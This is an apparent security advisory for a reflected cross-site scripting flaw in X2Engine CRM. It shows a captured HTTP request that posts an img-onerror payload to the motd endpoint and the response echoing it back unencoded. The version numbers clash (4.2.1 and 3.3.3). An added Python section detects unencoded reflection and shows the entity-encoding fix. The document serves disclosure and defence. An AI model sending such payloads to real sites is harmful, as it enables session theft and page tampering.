#Affected Vendor: http://www.x2engine.com/
#Date: 24/09/2014
#Discovered by: JoeV
#Type of vulnerability: XSS
#Tested on: Windows 7
#Version : 4.2.1
#Description: X2Engine CRM v 3.3.3 is susceptible to a Cross Site Scripting attack.
Proof of Concept (PoC):
---------------------------
POST /index-test.php/site/motd HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 63
Accept: */*
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/index-test.php/profile/1
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: iconSize=16x16; hudson_auto_refresh=true; /modules/system/admin.php_SystemAutotasks_sortsel=sat_name; /modules/system/admin.php_SystemAutotasks_ordersel=ASC; /modules/system/admin.php_limitsel=15; /modules/system/admin.php_SystemAutotasks_filtersel=default; cookies_on=1; __atuvc=2%7C39; PHPSESSID=6mefdfmcnj13282kb7anr4obe2

message=%22%3E%3Cimg+src%3Dd+onerror%3Dconfirm(%2Fxss%2F)%3B%3E

HTTP/1.1 200 OK
Date: Wed, 24 Sep 2014 14:00:57 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37
Content-Type: text/html

"><img src=d onerror=confirm(/xss/);>
--
Regards,
*Joel V*
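
Added example (not part of the original advisory, and not X2Engine code): a check that a form parameter is echoed unencoded in a text/html response, run over the request body and response from the PoC above, with the entity-encoded output a fixed endpoint would return. The function names are hypothetical and the sample values are copied from the capture.

```python
import html
from urllib.parse import parse_qsl

# Sample input: request body, response type and response body as they
# appear in the PoC exchange above.
REQUEST_BODY = "message=%22%3E%3Cimg+src%3Dd+onerror%3Dconfirm(%2Fxss%2F)%3B%3E"
RESPONSE_CONTENT_TYPE = "text/html"
RESPONSE_BODY = '"><img src=d onerror=confirm(/xss/);>'

# Characters that change meaning when a browser parses the text as HTML.
HTML_SIGNIFICANT = set('<>"\'&')


def find_unescaped_reflections(request_body, content_type, response_body):
    """Return the names of form parameters whose decoded value is echoed
    verbatim, markup characters included, in an HTML response."""
    if not content_type.lower().startswith("text/html"):
        return []  # the browser would not render this body as HTML
    findings = []
    for name, value in parse_qsl(request_body, keep_blank_values=True):
        # A value without HTML metacharacters looks the same raw or
        # encoded, so it cannot show whether output encoding is missing.
        if not HTML_SIGNIFICANT & set(value):
            continue
        if value in response_body:
            findings.append(name)
    return findings


def encoded_echo(value):
    """Entity-encode a value before writing it into HTML. In PHP the
    usual equivalent is htmlspecialchars() with ENT_QUOTES."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    # The captured exchange: the parameter is reflected unencoded.
    print(find_unescaped_reflections(
        REQUEST_BODY, RESPONSE_CONTENT_TYPE, RESPONSE_BODY))
    # The same request against an endpoint that encodes its output.
    fixed = encoded_echo(dict(parse_qsl(REQUEST_BODY))["message"])
    print(fixed)
    print(find_unescaped_reflections(
        REQUEST_BODY, RESPONSE_CONTENT_TYPE, fixed))
```

The same check can be used as a regression test after a fix: the finding list should be empty once the endpoint encodes the `message` value.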